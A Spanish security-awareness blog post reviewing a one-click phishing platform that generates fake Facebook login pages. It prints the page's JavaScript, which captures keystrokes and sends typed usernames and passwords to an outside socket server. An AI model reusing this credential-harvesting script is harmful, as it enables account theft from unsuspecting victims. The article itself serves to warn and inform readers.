23 de julio de 2017

La facilidad de los atacantes a día de hoy: Ataques de phishing a golpe de click

No es novedad que a diario se venden miles de herramientas de hacking usadas con fines maliciosos. Estas herramientas, por regla general, requieren de un mínimo de conocimiento por parte del ciberdelincuente, pero a día de hoy esto está cambiando, y es que ya existen plataformas para realizar múltiples tipos de ataques sin saber siquiera el nombre del mismo.

Hoy vamos a exponer un caso de uso de unas de las múltiples plataformas que se pueden encontrar por Internet. El nombre de la web no va a ser publicado para no fomentar el uso de la misma entre los lectores.

Llama la atención al entrar en la web, la interfaz amigable y por qué no decirlo, infantil que tiene. Parece una página sin ninguna malicia, sin embargo contiene numerosos tipos de ataques los cuáles están gravemente penados por la ley en nuestro país.

Al registrarte, lo primero que aparece es un mensaje de bienvenida el cuál nos indica que tienen un pequeño tutorial para nosotros.


Bienvenida a la plataforma

Al avanzar, nos encontramos un "about" de la web. Nos explica que la página nos da acceso a una serie de "complejas herramientas" y que en pocos pasos vamos a aprender a usar una de ellas de manera gratuita.

Realmente las herramientas a las que te dan acceso son muy simples y apenas requieren de conocimientos para hacer el ataque de forma manual.

Por supuesto, no era de dudar que cuenta con una versión PREMIUM para sacar más provecho a la herramienta.

Avanzamos a través de los paneles y podemos comprobar cómo el primer ataque que nos enseña es la realización de un phishing a Facebook.

Cómo hackear una cuenta de Facebook!

Aunque nuestros lectores están habituados a escuchar la palabra phishing, vamos a recordar que es un  ataque de phishing aquel que mediante ingeniería social, se centra en adquirir cierta información confidencial de la víctima. Para ello, el cibercriminal se hace pasar por una persona o entidad (en este caso por la red social Facebook) para solicitarle esa información.

Un par de clicks y nos genera un enlace con una burda versión de la página de Facebook para que se la enviaemos a nuestra víctima.

Al ver la web cualquier persona con unos conocimientos mínimos no caería ni por el enlace, el cuál es muy llamativo, ni por la imagen que da, la cuál es bastante pobre. Pero, sin embargo, alguien sin conocimientos sí que podría pensar que es una página legítima.

Enlaces generados para el ataque de phishing
Página de Facebook generada para el ataque

Pero algo todavía mucho más llamativo, es que al escribir la contraseña ni siquiera oculte los caracteres como haría un campo de tipo contraseña.


Detalles de la contraseña en texto claro

Si comprobamos el código fuente de la web generada para el ataque, vemos que apenas son 127 líneas. Dentro de ellas, podemos encontrar un hotlinking a los iconos de Facebook en una página externa a Facebook:

http://bit.ly/2uNyPjD
http://bit.ly/2upNkaF

También podemos ver el script que nos redirecciona a Facebook una vez "iniciamos sesión en la página":

   <script type="text/javascript">  
var BigData = {
id: '3015',
token: 'i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s',
name: 'Facebook',
site_id: '9',
redirect: 'http://bit.ly/2uNIjvc',
hsData: "9|3015|i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s|1500371221",
};
var socket = io('http://bit.ly/2uq1VTk');
socket.on('ping', function (data) {
socket.emit('hello', BigData );
});
socket.on('redirect', function(data){
window.location = BigData.redirect;
});
$(document).ready(function(){
$('body').click(function(e){
this.BigData = BigData;
socket.emit('clicked', this.BigData);
});
$('body').on('keyup', function(e){
this.BigData = BigData;
this.BigData.key = e.key;
socket.emit('keyup', this.BigData);
});
});
$("#login_form").keypress(function(e) {
if (e.which == 13) {
$("#submit").click();
}
});
$("#submit").click(function(e) {
e.preventDefault();
if ($("#username").val() == "") {
var err = "1";
alert('Username cannot be left empty');
}
if ($("#password").val() == "") {
var err = "1";
alert('Password cannot be left empty');
}
if (err != "1") {
socket.emit('log', {
username : $("#username").val(),
password : $("#password").val(),
hsData: BigData.hsData,
BigData: BigData,
});
}
});
</script>

Es un ataque de phishing muy básico pero que cualquier persona podría realizar sin ningún tipo de complicación ni conocimientos.

Al terminar de preparar el ataque, te recomiendan otras dos guías. La primera de ellas es para realizar un phishing a un correo electrónico y la segunda para ver los logs de las personas que han picado en el ataque.

Guías que ofrece el servicio

Si nos dirigimos al apartado de nuestra web creada, veremos cómo aparecen las estadísticas de las visitas recibidas:

Estadísticas de las visitas recibidas

Indagando un poco más en la página, podemos ver cómo ofrecen este servicio para realizar este tipo de ataque a 26 webs diferentes.

Servicios contra los que se puede crear un phishing a golpe de click

También cuentan con un market en el que puedes comprar o vender servicios. Los métodos de pago aceptados son muy variados, desde Bitcoin hasta Paypal pasando por Western Union y MoneyGram.

Servicios de pago aceptados

Si además pagamos por la cuenta PREMIUM antes mencionada, cabe destacar que tenemos acceso a más servicios, los cuáles parecen ser igual de mediocres que el anterior pero que con una víctima inexperta y un poco de ingeniería social, podrían ser realmente dañinos.

Servicios premium ofrecidos por la plataforma

Con esta una-al-día queríamos demostrar a nuestros lectores que hoy en día realizar acciones maliciosas en Internet no es complicado ni requiere de conocimientos Informáticos, pero en España puede llegar a incurrir en penas de 6 meses a 3 años de prisión. 

Para finalizar, recalcar que esta es una de las muchas plataformas de creación de phishing gratuitas que hay por Internet. Algunas más simples, otras más complejas, pero todas pueden ser usadas para realizar acciones maliciosas altamente penadas.


Daniel Púa




☛ El artículo completo original de noreply@blogger.com (Antonio Sánchez) lo puedes ver aquí

No hay comentarios.:

Publicar un comentario